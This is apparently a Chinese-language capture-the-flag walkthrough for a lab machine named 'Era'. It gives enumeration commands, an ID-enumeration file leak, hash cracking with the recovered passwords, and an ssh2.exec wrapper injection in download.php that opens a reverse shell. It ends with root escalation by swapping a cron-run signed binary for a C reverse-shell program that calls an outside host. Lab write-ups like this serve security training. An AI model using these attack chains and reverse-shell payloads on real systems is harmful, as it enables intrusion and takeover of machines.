nmap -T4 -v -A -Pn 10.10.11.79 -oN era.txt
80 port,添加域名/etc/hosts
USER
有几个用户名记一下先
Tom Rensed 、Kathren Mory、Lancer Jack
顺路扫一下目录和子域名
ffuf -w /home/kali/dict/fuzzDicts/subdomainDicts/main.txt -u "http://era.htb" -H "host:FUZZ.era.htb" -c -fc 302
加入/etc/hosts,访问一下
http://file.era.htb/security_login.php
http://file.era.htb/register.php
有个注册的地方可以试试
然后直接登录进去,可以看到一个上传文件的地方,上传之后点击可以下载
FUZZ id
可以看到这个 url,文件靠 id 来区分,那可以遍历一下,要带上 cookie,因为这是登录之后的
ffuf -w <(seq 1 10000) -u "http://file.era.htb/download.php?id=FUZZ" -H "Cookie:PHPSESSID=o449nm1ka507qstm3mvsq69c2n" -c -fs 7686
一个是签名文件,一个看着备份文件
解压后下面有个 filedb.sqlite
打开后有个 user 表
爆破一下
hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --show跑出来两个
eric:america
yuri:mustang
LFI
但是这两个用户的管理平台都没有东西,回去看看其他文件
download.php 里面这里逻辑show=true 且用户是 admin 则可以进入下面 else if 逻辑
下面的逻辑没有验证很多,是可以触发 LFI 的
但是没有 admin 的账号没密码,想到有个密保登录,可以试试
对应的源码应该是 security_login.php
这里可以看到对应的应该就是密保问题
直接再外面使用安全密保登录会失败,回到后台,会发现有更改安全问题的
全部更改之后,可以直接登录上去,厉害了
但是这个时候用之前的思路 php 伪协议读取文件行不通
http://file.era.htb/download.php?id=54&show=true&format=php://filter/read=convert.base64-encode/resource=/etc/passwd所以又要换,发现了 yuri 可以登录到 ftp
里面有 ssh2 的扩展,可以结合进行利用
http://file.era.htb/download.php?id=54&show=true&format=ssh2.exec://eric:america@127.0.0.1/bash%20-c%20%27echo%20<base64 reverse shell>|base64%20-d|bash%27;
顺路起个伪终端
python3 -c 'import pty;pty.spawn("/bin/bash");'这里就可以看到 user.txt 了
ROOT
cron
sudo -l 没有上传 linpeas.sh,开跑
也没什么东西,上传 pspy
pspy -cpf -i 1000
现在这里面很重要的流程是
objcopy --dump-section .text_sig=text_sig_section.bin /opt/AV/periodic-checks/monitor 检查monitor 的.text_sig 文件,校验文件完整性
然后就会执行
/opt/AV/periodic-checks/monitor
所以我们可以覆盖 monitor 为一个反弹 shell 的文件,同时这个 reverse shell 文件需要有.text_sig 与原monitor 保持一致
#include<stdlib.h>
int main(){
system("bash >& /dev/tcp/<ip>/5566 0>&1");
return 0;
}
gcc payload.c -o reshell
导出原monitor 的.text_sig,然后加入我们的 reshell
最后复覆盖 monitor
objcopy --dump-section .text_sig=ikun /opt/AV/periodic-checks/monitor
objcopy --add-section .text_sig=ikun reshell
cp /home/eric/reshell monitor
等着就行了,就可以拿到
Comments | NOTHING